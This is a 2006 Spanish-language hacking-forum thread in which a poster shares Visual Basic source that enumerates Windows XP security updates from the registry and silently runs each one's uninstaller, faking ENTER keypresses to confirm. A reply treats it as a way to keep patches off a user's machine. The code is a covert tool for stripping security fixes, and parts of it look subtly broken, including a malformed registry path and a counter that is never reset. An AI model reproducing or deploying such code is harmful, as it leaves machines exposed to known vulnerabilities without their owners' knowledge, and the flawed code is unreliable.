elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Programa] Desinstalador de parches de seguridad en Windows XP
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Programa] Desinstalador de parches de seguridad en Windows XP  (Leído 1,957 veces)
Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
[Programa] Desinstalador de parches de seguridad en Windows XP
« en: 9 Marzo 2006, 16:56 pm »

Weno, este programa lo que ahce es desinstalar los parches de seguridad de Windows. Les dejo el kode:

Código:
Const ERROR_NO_MORE_ITEMS = 259&
Const HKEY_CURRENT_CONFIG = &H80000005
Const HKEY_LOCAL_MACHINE = &H80000002
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegEnumKeyEx Lib "advapi32.dll" Alias "RegEnumKeyExA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpName As String, lpcbName As Long, ByVal lpReserved As Long, ByVal lpClass As String, lpcbClass As Long, lpftLastWriteTime As Any) As Long
Private Declare Function RegEnumValue Lib "advapi32.dll" Alias "RegEnumValueA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpValueName As String, lpcbValueName As Long, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

Private Sub Wait(ByVal nSec As Integer)

    t1 = Second(Now)
    t2 = t1 + nSec
    Do
        DoEvents
    Loop While t2 > Second(Now)
End Sub


Sub matar()
For i = 0 To List1.ListCount - 1
Shell ("C:\WINDOWS\$NtUninstall" & List1.List(i) & "$\spuninst\spuninst.exe"), vbHide
Wait (5)
SendKeys ("{ENTER}")
Wait (90)
Next
End Sub


Private Sub Form_Load()
    'KPD-Team 2001
    'URL: http://www.allapi.net/
    'E-Mail: KPDTeam@Allapi.net
    Dim hKey As Long, Cnt As Long, sName As String, sData As String, Ret As Long, RetData As Long
    Const BUFFER_SIZE As Long = 255
    'Set the forms graphics mode to persistent
    Ret = BUFFER_SIZE
    'Open the registry key
    If RegOpenKey(HKEY_LOCAL_MACHINE, "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP", hKey) = 0 Then
        'Create a buffer
        sName = Space(BUFFER_SIZE)
        'Enumerate the keys
        While RegEnumKeyEx(hKey, Cnt, sName, Ret, ByVal 0&, vbNullString, ByVal 0&, ByVal 0&) <> ERROR_NO_MORE_ITEMS
            'Show the enumerated key
           List2.AddItem Left$(sName, Ret)
            'prepare for the next key
            Cnt = Cnt + 1
            sName = Space(BUFFER_SIZE)
            Ret = BUFFER_SIZE
        Wend
        'close the registry key
        RegCloseKey hKey
    Else
        Me.Print "  Error while calling RegOpenKey"
    End If
   
    For i = 0 To List2.ListCount - 1
   
    If RegOpenKey(HKEY_LOCAL_MACHINE, "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP2", hKey) = 0 Then
        'Create a buffer
        sName = Space(BUFFER_SIZE)
        'Enumerate the keys
        While RegEnumKeyEx(hKey, Cnt, sName, Ret, ByVal 0&, vbNullString, ByVal 0&, ByVal 0&) <> ERROR_NO_MORE_ITEMS
            'Show the enumerated key
           List1.AddItem Left$(sName, Ret)
            'prepare for the next key
            Cnt = Cnt + 1
            sName = Space(BUFFER_SIZE)
            Ret = BUFFER_SIZE
        Wend
        'close the registry key
        RegCloseKey hKey
    Else
        Me.Print "  Error while calling RegOpenKey"
    End If
    Wait (1)
    matar
    Wait (120)
    Next
    End
   
End Sub

Hay kode que no es mio, me lo paso kizar en otro post.

Weno, nota para los mas expertos, Si ven algun fallo diganlo porfa.... ;) ;) ;)

Salu2

Hendrix



En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
NYlOn


Desconectado Desconectado

Mensajes: 842


OOOOHHHHHH, TARAGÜIIII xDDDDDD


Ver Perfil WWW
Re: [Programa] Desinstalador de parches de seguridad en Windows XP
« Respuesta #1 en: 10 Marzo 2006, 04:29 am »

Corriganme por favor si estoy equivocado, pero yo tengo entendido que las calves en el registro acerca de las actualizaiones son solo para mantener una cuenta. Es decir que aunque no figure la actualizacion en el registro, la actualizacion va a seguir estando ahi...

 :huh:


En línea

Gorky


Desconectado Desconectado

Mensajes: 770



Ver Perfil WWW
Re: [Programa] Desinstalador de parches de seguridad en Windows XP
« Respuesta #2 en: 10 Marzo 2006, 12:44 pm »

Corriganme por favor si estoy equivocado, pero yo tengo entendido que las calves en el registro acerca de las actualizaiones son solo para mantener una cuenta. Es decir que aunque no figure la actualizacion en el registro, la actualizacion va a seguir estando ahi...

 :huh:

No se si llevaras razon o no pero, ¿que mas dara que la actualizacion este o no? Lo importante es que no se le aplique al usuario.
En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: [Programa] Desinstalador de parches de seguridad en Windows XP
« Respuesta #3 en: 10 Marzo 2006, 15:06 pm »

El programa lo que hace es buskar la ruta del programa de DESINSTALACION del parche y luego lo ejekuta....

Salu2

Hendrix

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Primeros parches para Windows 8 del 2013
Noticias
wolfbcn 0 1,853 Último mensaje 4 Enero 2013, 14:57 pm
por wolfbcn
Windows 10 también recibirá parches de seguridad
Noticias
wolfbcn 0 1,044 Último mensaje 7 Noviembre 2014, 13:42 pm
por wolfbcn
Actualización mensual de Windows contiene 53 parches de seguridad
Noticias
wolfbcn 0 1,129 Último mensaje 17 Noviembre 2017, 01:34 am
por wolfbcn
¡Actualiza Windows! los parches de seguridad de julio corrigen 77 ....
Noticias
wolfbcn 0 790 Último mensaje 10 Julio 2019, 13:28 pm
por wolfbcn
Los nuevos parches de seguridad de Windows 10 llegan con problemas
Noticias
El_Andaluz 0 1,771 Último mensaje 9 Septiembre 2020, 23:55 pm
por El_Andaluz
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines